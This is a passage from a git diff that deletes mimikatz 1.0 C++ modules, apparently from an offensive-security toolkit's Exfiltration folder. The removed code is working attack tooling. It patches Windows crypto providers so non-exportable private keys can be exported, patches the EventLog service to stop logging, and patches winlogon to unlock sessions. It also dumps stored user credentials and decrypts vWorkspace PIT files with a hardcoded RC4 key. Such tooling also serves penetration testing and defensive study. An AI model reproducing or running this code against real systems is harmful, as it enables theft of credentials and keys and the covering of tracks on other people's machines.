sizeof(DWORD); - reussite &= (CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(&exportability), &tailleEcrite, NULL) != 0); - exportable = (exportability & CRYPT_EXPORT) != 0; - } - - if(aFermer) - { - CryptReleaseContext(monProv, 0); - } - } - if(reussite) - { - (*outputStream) << L"\t\tExportabilit : " << (exportable ? L"OUI" : L"NON") << endl; - (*outputStream) << L"\t\tTaille cl : " << size << endl; - } - - if(exportCert) - { - wstring PFXFile = monBuff.str(); - PFXFile.append(L"pfx"); - - reussite = mod_crypto::CertCTXtoPFX(pCertContext, PFXFile, L"mimikatz"); - - (*outputStream) << L"\t\tExport priv dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl; - } - } - } - else (*outputStream) << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl; - } - - if(exportCert) - { - wstring DERFile = monBuff.str(); - DERFile.append(L"der"); - - reussite = mod_crypto::CertCTXtoDER(pCertContext, DERFile); - - (*outputStream) << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl; - } - } - delete certName; - } - CertCloseStore(hCertificateStore, CERT_CLOSE_STORE_FORCE_FLAG); - } - else (*outputStream) << L"CertOpenStore : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L" introuvable !" << endl; -} - - -bool mod_mimikatz_crypto::patchcapi(vector<wstring> * arguments) -{ - wchar_t LIBNAME_WALL_RSA[] = L"rsaenh.dll"; - char FUNCNAM_WALL_EXPORT[] = "CPExportKey"; -#ifdef _M_X64 - BYTE PTRN_WIN5_CPExportKey_4001[] = {0x0c, 0x01, 0x40, 0x00, 0x00, 0x75}; - BYTE PTRN_WIN5_CPExportKey_4000[] = {0x0c, 0x0e, 0x72}; - BYTE PATC_WIN5_CPExportKey_EXPORT[] = {0xeb}; - LONG OFFS_WIN5_CPExportKey_4001_EXPORT = -4; - LONG OFFS_WIN5_CPExportKey_4000_EXPORT = -5; - - BYTE PTRN_W6AL_CPExportKey_4001[] = {0x0c, 0x01, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PTRN_WIN6_CPExportKey_4000[] = {0x0c, 0x0e, 0x0f, 0x82}; - BYTE PTRN_WIN8_CPExportKey_4000[] = {0x0c, 0x00, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PATC_W6AL_CPExportKey_EXPORT[] = {0x90, 0xe9}; - LONG OFFS_W6AL_CPExportKey_EXPORT = 5; - LONG OFFS_WIN6_CPExportKey_4000_EXPORT = 2; -#elif defined _M_IX86 - BYTE PTRN_WIN5_CPExportKey_4001[] = {0x08, 0x01, 0x40, 0x75}; - BYTE PTRN_WIN5_CPExportKey_4000[] = {0x09, 0x40, 0x0f, 0x84}; - BYTE PATC_WIN5_CPExportKey_EXPORT[] = {0xeb}; - LONG OFFS_WIN5_CPExportKey_4001_EXPORT = -5; - LONG OFFS_WIN5_CPExportKey_4000_EXPORT = -7; - - BYTE PTRN_WI60_CPExportKey_4001[] = {0x08, 0x01, 0x40, 0x0f, 0x85}; - BYTE PTRN_WIN6_CPExportKey_4001[] = {0x08, 0x01, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PTRN_WI60_CPExportKey_4000[] = {0x08, 0x00, 0x40, 0x0f, 0x85}; - BYTE PTRN_WIN6_CPExportKey_4000[] = {0x08, 0x00, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PATC_W6AL_CPExportKey_EXPORT[] = {0x90, 0xe9}; - LONG OFFS_WI60_CPExportKey_EXPORT = 3; - LONG OFFS_WIN6_CPExportKey_EXPORT = 5; -#endif - - PBYTE ptr4001 = NULL; PBYTE pattern4001 = NULL; ULONG taillePattern4001 = 0; PBYTE patch4001 = NULL; ULONG taillePatch4001 = 0; LONG offsetPatch4001 = 0; - PBYTE ptr4000 = NULL; PBYTE pattern4000 = NULL; ULONG taillePattern4000 = 0; PBYTE patch4000 = NULL; ULONG taillePatch4000 = 0; LONG offsetPatch4000 = 0; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern4001 = PTRN_WIN5_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_WIN5_CPExportKey_4001); - pattern4000 = PTRN_WIN5_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN5_CPExportKey_4000); - patch4001 = patch4000 = PATC_WIN5_CPExportKey_EXPORT; taillePatch4001 = taillePatch4000 = sizeof(PATC_WIN5_CPExportKey_EXPORT); - offsetPatch4001 = OFFS_WIN5_CPExportKey_4001_EXPORT; - offsetPatch4000 = OFFS_WIN5_CPExportKey_4000_EXPORT; - } - else - { -#ifdef _M_X64 - pattern4001 = PTRN_W6AL_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_W6AL_CPExportKey_4001); - patch4001 = patch4000 = PATC_W6AL_CPExportKey_EXPORT; taillePatch4001 = taillePatch4000 = sizeof(PATC_W6AL_CPExportKey_EXPORT); - offsetPatch4001 = OFFS_W6AL_CPExportKey_EXPORT; - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern4000 = PTRN_WIN6_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN6_CPExportKey_4000); - offsetPatch4000 = OFFS_WIN6_CPExportKey_4000_EXPORT; - } - else - { - pattern4000 = PTRN_WIN8_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN8_CPExportKey_4000); - offsetPatch4000 = OFFS_W6AL_CPExportKey_EXPORT; - } -#elif defined _M_IX86 - patch4001 = patch4000 = PATC_W6AL_CPExportKey_EXPORT; taillePatch4001 = taillePatch4000 = sizeof(PATC_W6AL_CPExportKey_EXPORT); - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - pattern4001 = PTRN_WI60_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_WI60_CPExportKey_4001); - pattern4000 = PTRN_WI60_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WI60_CPExportKey_4000); - offsetPatch4001 = offsetPatch4000 = OFFS_WI60_CPExportKey_EXPORT; - } - else - { - pattern4001 = PTRN_WIN6_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_WIN6_CPExportKey_4001); - pattern4000 = PTRN_WIN6_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN6_CPExportKey_4000); - offsetPatch4001 = offsetPatch4000 = OFFS_WIN6_CPExportKey_EXPORT; - } -#endif - } - - if(HMODULE hRSA = LoadLibrary(LIBNAME_WALL_RSA)) - { - if( mod_memory::genericPatternSearch(&ptr4001, LIBNAME_WALL_RSA, pattern4001, taillePattern4001, offsetPatch4001, FUNCNAM_WALL_EXPORT, true, true) && - mod_memory::genericPatternSearch(&ptr4000, LIBNAME_WALL_RSA, pattern4000, taillePattern4000, offsetPatch4000, FUNCNAM_WALL_EXPORT, true, true)) - { - (*outputStream) << L"Patterns CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE et CRYPT_ARCHIVABLE trouvs !" << endl << - L"Patch CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4001, patch4001, taillePatch4001) ? L"OK" : L"KO") << endl << - L"Patch CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4000, patch4000, taillePatch4000) ? L"OK" : L"KO") << endl; - } - FreeLibrary(hRSA); - } - return true; -} - -bool mod_mimikatz_crypto::patchcng(vector<wstring> * arguments) -{ - wchar_t LIBNAME_WNO8_NCrypt[] = L"ncrypt.dll"; - wchar_t LIBNAME_WIN8_NCrypt[] = L"ncryptprov.dll"; -#ifdef _M_X64 - BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x75}; - BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x43, 0x24, 0x02, 0x75}; - BYTE PTRN_WI60_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x0f, 0x85}; - - BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9}; - BYTE PATC_WI60_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; - BYTE PATC_WALL_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; -#elif defined _M_IX86 - BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75}; - BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x75}; - - BYTE PATC_WNO8_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; - BYTE PATC_WIN8_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; -#endif - BYTE PATC_WALL_SPCryptExportKey_EXPORT[] = {0xeb}; - LONG OFFS_WALL_SPCryptExportKey_EXPORT = 4; - - if(mod_cryptong::isNcrypt) - { - if(mod_cryptong::justInitCNG()) - { - wchar_t * libName; PBYTE pattern = NULL; ULONG taillePattern = 0; PBYTE patch = NULL; ULONG taillePatch = 0; LONG offsetPatch = 0; - - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - pattern = PTRN_WI60_SPCryptExportKey; - taillePattern = sizeof(PTRN_WI60_SPCryptExportKey); - } - else - { -#endif - pattern = PTRN_WNO8_SPCryptExportKey; - taillePattern = sizeof(PTRN_WNO8_SPCryptExportKey); -#ifdef _M_X64 - } -#endif - libName = LIBNAME_WNO8_NCrypt; - } - else - { - pattern = PTRN_WIN8_SPCryptExportKey; - taillePattern = sizeof(PTRN_WIN8_SPCryptExportKey); - libName = LIBNAME_WIN8_NCrypt; - } - - if(arguments->empty()) - { -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - patch = PATC_WI60_SPCryptExportKey_EXPORT; - taillePatch = sizeof(PATC_WI60_SPCryptExportKey_EXPORT); - } - else - { -#endif - patch = PATC_WALL_SPCryptExportKey_EXPORT; - taillePatch = sizeof(PATC_WALL_SPCryptExportKey_EXPORT); -#ifdef _M_X64 - } -#endif - } - else - { -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - patch = PATC_WI60_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WI60_SPCryptExportKey_NOEXPORT); - } - else - { - patch = PATC_WALL_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WALL_SPCryptExportKey_NOEXPORT); - } -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - patch = PATC_WNO8_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WNO8_SPCryptExportKey_NOEXPORT); - } - else - { - patch = PATC_WIN8_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WIN8_SPCryptExportKey_NOEXPORT); - } -#endif - } - offsetPatch = OFFS_WALL_SPCryptExportKey_EXPORT; - - mod_patch::patchModuleOfService(L"KeyIso", libName, pattern, taillePattern, patch, taillePatch, offsetPatch); - } - else (*outputStream) << L"Impossible d\'initialiser la CNG : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"Pas de CNG ?" << endl; - - return true; -} - -void mod_mimikatz_crypto::sanitizeFileName(wstring * fileName) -{ - wchar_t monTab[] = {L'\\', L'/', L':', L'*', L'?', L'\"', L'<', L'>', L'|'}; - for(wstring::iterator monIterateur = fileName->begin(); monIterateur != fileName->end(); monIterateur++) - { - for(ULONG i = 0; i < sizeof(monTab) / sizeof(wchar_t); i++) - { - if(*monIterateur == monTab[i]) - { - *monIterateur = L'~'; - break; - } - } - } -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.h deleted file mode 100644 index 7d81c07..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.h +++ /dev/null @@ -1,36 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_cryptoapi.h" -#include "mod_cryptong.h" -#include "mod_crypto.h" -#include "mod_process.h" -#include "mod_patch.h" -#include <iostream> -#include <sstream> - -class mod_mimikatz_crypto -{ -private: - static void sanitizeFileName(wstring * fileName); - static void listAndOrExportCertificates(vector<wstring> * arguments, bool exportCert = false); - static void listAndOrExportKeys(vector<wstring> * arguments, bool exportKeys = false); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool listProviders(vector<wstring> * arguments); - static bool listStores(vector<wstring> * arguments); - static bool listKeys(vector<wstring> * arguments); - static bool listCertificates(vector<wstring> * arguments); - - static bool exportCertificates(vector<wstring> * arguments); - static bool exportKeys(vector<wstring> * arguments); - - static bool patchcapi(vector<wstring> * arguments); - static bool patchcng(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.cpp deleted file mode 100644 index 019644d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.cpp +++ /dev/null @@ -1,306 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_divers.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_divers::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(noroutemon, L"noroutemon", L"[experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(eventdrop, L"eventdrop", L"[super experimental] Patch l\'observateur d\'vnements pour ne plus rien enregistrer")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cancelator, L"cancelator", L"Patch le bouton annuler de Windows XP et 2003 en console pour dverrouiller une session")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(secrets, L"secrets", L"Affiche les secrets utilisateur")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(nodetour, L":nodetour", L"Anti-dtours SR")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pitme, L":pitme", L"Dchiffre les fichiers PIT (Quest vWorkspace Client)")); - return monVector; -} - -bool mod_mimikatz_divers::nodetour(vector<wstring> * arguments) -{ - vector<mod_patch::OS> mesOS; - mesOS.push_back(mod_patch::WINDOWS_2003_____x64); - mesOS.push_back(mod_patch::WINDOWS_VISTA____x64); - mesOS.push_back(mod_patch::WINDOWS_2008_____x64); - mesOS.push_back(mod_patch::WINDOWS_SEVEN____x64); - mesOS.push_back(mod_patch::WINDOWS_2008r2___x64); - - if(mod_patch::checkVersion(&mesOS)) - { - BYTE monSysEnterRetn[] = {0x0f, 0x05, 0xc3}; - BYTE monDetouredStub[] = {0x90, 0x90, 0xe9}; - - PBYTE monNTDLLptr = reinterpret_cast<PBYTE>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenProcess")); - if(memcmp(monNTDLLptr + 8, monDetouredStub, sizeof(monDetouredStub)) == 0) - { - (*outputStream) << L"Dtour trouv et "; - if(mod_memory::writeMemory(monNTDLLptr + 8 + sizeof(monDetouredStub) + sizeof(LONG) + *reinterpret_cast<PLONG>(monNTDLLptr + 8 + sizeof(monDetouredStub)), monSysEnterRetn, sizeof(monSysEnterRetn))) - (*outputStream) << L"patch :)"; - else - (*outputStream) << L"NON patch :("; - (*outputStream) << endl; - } - else - (*outputStream) << L"Dtour non trouv" << endl; - } - return true; -} - - -bool mod_mimikatz_divers::cancelator(vector<wstring> * arguments) -{ - vector<mod_patch::OS> mesOS; - mesOS.push_back(mod_patch::WINDOWS_XP_PRO___x86); - mesOS.push_back(mod_patch::WINDOWS_2003_____x86); - - if(mod_patch::checkVersion(&mesOS)) - { - BYTE patternCMPJMP[] = {0xff, 0xff, 0xff, 0x83, 0xff, 0x02, 0x0f, 0x84}; - BYTE patternNOP[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90}; - long offsetCibleNOP = 3; - - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcesses = new vector<mod_process::KIWI_PROCESSENTRY32>(); - wstring processName = L"winlogon.exe"; - - if(mod_process::getList(mesProcesses, &processName)) - { - for(vector<mod_process::KIWI_PROCESSENTRY32>::iterator leProcess = mesProcesses->begin(); leProcess != mesProcesses->end(); leProcess++) - { - mod_patch::patchModuleOfPID(leProcess->th32ProcessID, L"", patternCMPJMP, sizeof(patternCMPJMP), patternNOP, sizeof(patternNOP), offsetCibleNOP); - } - } - - delete mesProcesses; - } - return true; -} - - -bool mod_mimikatz_divers::noroutemon(vector<wstring> * arguments) -{ - //BYTE patternTestRouteMon[] = {0x83, 0xec, 0x1c, 0x55, 0x8b, 0xe9}; // 7.0 // 83 ec 1c 55 8b e9 - BYTE patternTestRouteMon[] = {0x83, 0xec, 0x14, 0x53, 0x8b, 0xd9}; // 7.1 // 83 ec 14 53 8b d9 - BYTE patternNoTestRouteMon[] = {0xb0, 0x01, 0xc2, 0x04, 0x00}; - - mod_patch::patchModuleOfService(L"dsNcService", L"", patternTestRouteMon, sizeof(patternTestRouteMon), patternNoTestRouteMon, sizeof(patternNoTestRouteMon)); - return true; -} - -bool mod_mimikatz_divers::eventdrop(vector<wstring> * arguments) -{ - wchar_t LIBNAME_WNT5_EVTLOG[] = L"eventlog.dll"; - wchar_t LIBNAME_WNT6_EVTLOG[] = L"wevtsvc.dll"; -#ifdef _M_X64 - BYTE PTRN_WNT5_PerformWriteRequest[] = {0x49, 0x89, 0x5b, 0x10, 0x49, 0x89, 0x73, 0x18}; - LONG OFFS_WNT5_PerformWriteRequest = -10; - BYTE PATC_WNT5_PerformWriteRequest[] = {0x45, 0x33, 0xed, 0xc3}; - - BYTE PTRN_WN60_Channel__ActualProcessEvent[] = {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0x48, 0x8b, 0xda, 0xe8}; - LONG OFFS_WN60_Channel__ActualProcessEvent = 0; - BYTE PATC_WN62_Channel__ActualProcessEvent[] = {0xff, 0xf7, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8}; - LONG OFFS_WN62_Channel__ActualProcessEvent = 0; - - BYTE PATC_WNT6_Channel__ActualProcessEvent[] = {0xc3}; -#elif defined _M_IX86 - BYTE PTRN_WNT5_PerformWriteRequest[] = {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d}; - LONG OFFS_WNT5_PerformWriteRequest = -20; - BYTE PATC_WNT5_PerformWriteRequest[] = {0x33, 0xc0, 0xc2, 0x04, 0x00}; - - BYTE PTRN_WN60_Channel__ActualProcessEvent[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x56, 0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0xe8}; - LONG OFFS_WN60_Channel__ActualProcessEvent = 0; - BYTE PATC_WN61_Channel__ActualProcessEvent[] = {0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0xe8}; - LONG OFFS_WN61_Channel__ActualProcessEvent = -(5 + 5 + 2); - BYTE PATC_WN62_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x75, 0x0c}; - LONG OFFS_WN62_Channel__ActualProcessEvent = -(5 + 1 + 1 + 1 + 3 + 1 + 6 + 5 + 2 + 3 + 2 + 1 + 2); - - BYTE PATC_WNO8_Channel__ActualProcessEvent[] = {0xc2, 0x04, 0x00}; - BYTE PATC_WIN8_Channel__ActualProcessEvent[] = {0xc2, 0x08, 0x00}; -#endif - - BYTE * PTRN_Process = NULL; DWORD SIZE_PTRN_Process = 0; - BYTE * PATC_Process = NULL; DWORD SIZE_PATC_Process = 0; - LONG OFFS_PATC_Process = 0; - wstring libEvent; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - libEvent.assign(LIBNAME_WNT5_EVTLOG); - PTRN_Process = PTRN_WNT5_PerformWriteRequest; SIZE_PTRN_Process = sizeof(PTRN_WNT5_PerformWriteRequest); - PATC_Process = PATC_WNT5_PerformWriteRequest; SIZE_PATC_Process = sizeof(PATC_WNT5_PerformWriteRequest); - OFFS_PATC_Process = OFFS_WNT5_PerformWriteRequest; - } - else - { - libEvent.assign(LIBNAME_WNT6_EVTLOG); - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - PTRN_Process = PTRN_WN60_Channel__ActualProcessEvent; SIZE_PTRN_Process = sizeof(PTRN_WN60_Channel__ActualProcessEvent); - OFFS_PATC_Process = OFFS_WN60_Channel__ActualProcessEvent; -#ifdef _M_X64 - } -#elif defined _M_IX86 - PATC_Process = PATC_WNO8_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WNO8_Channel__ActualProcessEvent); - } - else if(mod_system::GLOB_Version.dwMinorVersion < 2) - { - PTRN_Process = PATC_WN61_Channel__ActualProcessEvent; SIZE_PTRN_Process = sizeof(PATC_WN61_Channel__ActualProcessEvent); - OFFS_PATC_Process = OFFS_WN61_Channel__ActualProcessEvent; - PATC_Process = PATC_WNO8_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WNO8_Channel__ActualProcessEvent); - } -#endif - else - { - PTRN_Process = PATC_WN62_Channel__ActualProcessEvent; SIZE_PTRN_Process = sizeof(PATC_WN62_Channel__ActualProcessEvent); - OFFS_PATC_Process = OFFS_WN62_Channel__ActualProcessEvent; -#ifdef _M_IX86 - PATC_Process = PATC_WIN8_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WIN8_Channel__ActualProcessEvent); -#endif - } - -#ifdef _M_X64 - PATC_Process = PATC_WNT6_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WNT6_Channel__ActualProcessEvent); -#endif - } - - mod_patch::patchModuleOfService(L"EventLog", libEvent, PTRN_Process, SIZE_PTRN_Process, PATC_Process, SIZE_PATC_Process, OFFS_PATC_Process); - - return true; -} - -bool mod_mimikatz_divers::secrets(vector<wstring> * arguments) -{ - DWORD credNb = 0; - PCREDENTIAL * pCredential = NULL; - DWORD flags = (arguments->empty() ? 0 : CRED_ENUMERATE_ALL_CREDENTIALS); - - if(CredEnumerate(NULL, flags, &credNb, &pCredential)) - { - (*outputStream) << L"Nombre de secrets : " << credNb << endl; - - for(DWORD i = 0; i < credNb; i++) - { - wstring type; - bool isCertificate = false; - switch(pCredential[i]->Type) - { - case CRED_TYPE_GENERIC: - type.assign(L"GENERIC"); - break; - case CRED_TYPE_DOMAIN_PASSWORD: - type.assign(L"DOMAIN_PASSWORD"); - break; - case CRED_TYPE_DOMAIN_CERTIFICATE: - type.assign(L"DOMAIN_CERTIFICATE"); - isCertificate = true; - break; - case CRED_TYPE_DOMAIN_VISIBLE_PASSWORD: - type.assign(L"DOMAIN_VISIBLE_PASSWORD"); - break; - case CRED_TYPE_GENERIC_CERTIFICATE: - type.assign(L"GENERIC_CERTIFICAT"); - isCertificate = true; - break; - case CRED_TYPE_DOMAIN_EXTENDED: - type.assign(L"DOMAIN_EXTENDED"); - break; - default: - type.assign(L"?"); - } - - (*outputStream) << - L"TargetName : " << (pCredential[i]->TargetName ? pCredential[i]->TargetName : L"<NULL>") << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl << - L"Type : " << type << L" (" << pCredential[i]->Type << L')' << endl << - L"Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl << - L"UserName : " << (pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>") << endl << - L"Credential : " << mod_text::stringOrHex(pCredential[i]->CredentialBlob, pCredential[i]->CredentialBlobSize) << endl << - endl; - } - CredFree(pCredential); - } - else (*outputStream) << L"CredEnumerate : " << mod_system::getWinError() << endl; - - return true; -} - - -bool mod_mimikatz_divers::pitme(vector<wstring> * arguments) -{ - static const BYTE HARDCODED_KEY[] = { - 0x80, 0x5b, 0xe8, 0x18, 0x6f, 0x64, 0x89, 0x3a, 0x34, 0xce, 0x59, 0xdf, 0x4d, 0xb4, 0x5a, 0x0f, - 0x69, 0x94, 0x58, 0x70, 0x71, 0x4b, 0x17, 0xcf, 0xc3, 0x40, 0xaa, 0xfc, 0xc5, 0xe0, 0x21, 0xdb, - 0x9a, 0x49, 0x68, 0xb8, 0x2f, 0x4a, 0x6c, 0xdc, 0x7a, 0x8b, 0x7f, 0x5c, 0x03, 0x08, 0xfe, 0x39, - 0xa3, 0xc6, 0x31, 0xa6, 0x8c, 0xbd, 0x72, 0xa4, 0x8a, 0x1b, 0x92, 0xd5, 0x87, 0xad, 0x78, 0x8f, - 0x55, 0x96, 0x0b, 0x30, 0xa8, 0x43, 0x53, 0xb0, 0x62, 0xa0, 0xda, 0x7c, 0x13, 0x8d, 0x5d, 0x81, - 0xc0, 0x8e, 0x90, 0x88, 0xe4, 0xb7, 0x76, 0xc2, 0xb5, 0x04, 0x93, 0xa5, 0xa9, 0x9e, 0xab, 0xf5, - 0x37, 0xac, 0x99, 0x26, 0xe2, 0x38, 0x85, 0xe1, 0x74, 0x77, 0x32, 0xe5, 0x91, 0x23, 0xb1, 0x10, - 0x4c, 0x47, 0x3f, 0xbe, 0x82, 0x22, 0x6a, 0x51, 0xd0, 0x63, 0x75, 0x11, 0x33, 0x9b, 0xfb, 0x3b, - 0xca, 0xed, 0xdd, 0x44, 0xe6, 0x12, 0x4e, 0x97, 0x3c, 0x79, 0x4f, 0x41, 0x66, 0xba, 0x50, 0x0e, - 0xc9, 0x6b, 0x05, 0xee, 0x6e, 0xe7, 0x95, 0x7b, 0x60, 0x9d, 0xff, 0xc4, 0x29, 0x86, 0xb9, 0x7d, - 0x98, 0xc8, 0x9c, 0x35, 0xbb, 0xbc, 0xef, 0xfa, 0x3d, 0x06, 0xf9, 0x36, 0xbf, 0x3e, 0x7e, 0xa2, - 0xc7, 0x56, 0xae, 0xcb, 0xaf, 0xe9, 0x42, 0x61, 0xf0, 0x1d, 0xfd, 0x65, 0x9f, 0x52, 0x27, 0xea, - 0x24, 0xa1, 0xa7, 0xb2, 0x6d, 0x14, 0xb3, 0x45, 0xf8, 0xb6, 0xf7, 0x73, 0xc1, 0x83, 0x84, 0xf4, - 0xcc, 0xcd, 0xf3, 0xe3, 0x54, 0x15, 0xd1, 0x46, 0x07, 0x57, 0x2c, 0xd2, 0xd3, 0xd6, 0xd4, 0xd7, - 0xf6, 0xeb, 0xd8, 0x1c, 0x00, 0x09, 0xec, 0x67, 0x0a, 0xd9, 0x16, 0xde, 0xf1, 0xf2, 0x01, 0x2d, - 0x5e, 0x48, 0x02, 0x0c, 0x5f, 0x0d, 0x19, 0x1a, 0x28, 0x1e, 0x1f, 0x20, 0x25, 0x2a, 0x2b, 0x2e - }; - static const DWORD SUBKEY_SIZE = 16; - static const BYTE HEADER_PIT[] = {'P', 'I', 'T'}; - - FILE * monFichierSource, * monFichierDestination; - BYTE * monBuffer, * monBufferData; - ULONG tailleFichierSource, tailleData; - - if(arguments->size() < 1) - { - (*outputStream) << L"divers:::pitme file.pit [file.rdp]" << endl; - } - else - { - (*outputStream) << L" * Ouverture en lecture du fichier \'" << arguments->front() << L"\' : "; - if(monFichierSource = _wfopen(arguments->front().c_str(), L"rb")) - { - fseek(monFichierSource, 0, SEEK_END); - tailleFichierSource = ftell(monFichierSource); - monBuffer = new BYTE[tailleFichierSource]; - fseek(monFichierSource, 0, SEEK_SET); - fread(monBuffer, tailleFichierSource, 1, monFichierSource); - fclose(monFichierSource); - - (*outputStream) << L"OK" << endl << L" * Dchiffrement n1 : "; - if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource, HARDCODED_KEY, sizeof(HARDCODED_KEY), CALG_RC4)) - { - (*outputStream) << L"OK" << endl << L" * Dchiffrement n2 : "; - if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource - SUBKEY_SIZE, monBuffer + tailleFichierSource - SUBKEY_SIZE, SUBKEY_SIZE, CALG_RC4)) - { - (*outputStream) << L"OK" << endl << L" * En-tte : "; - if(memcmp(monBuffer, HEADER_PIT, sizeof(HEADER_PIT)) == 0) - { - (*outputStream) << L"OK" << endl; - monBufferData = monBuffer + sizeof(HEADER_PIT); - tailleData = tailleFichierSource - sizeof(HEADER_PIT) - SUBKEY_SIZE; - - if(arguments->size() > 1) - { - (*outputStream) << L" * Ouverture en criture du fichier \'" << arguments->back() << L"\' : 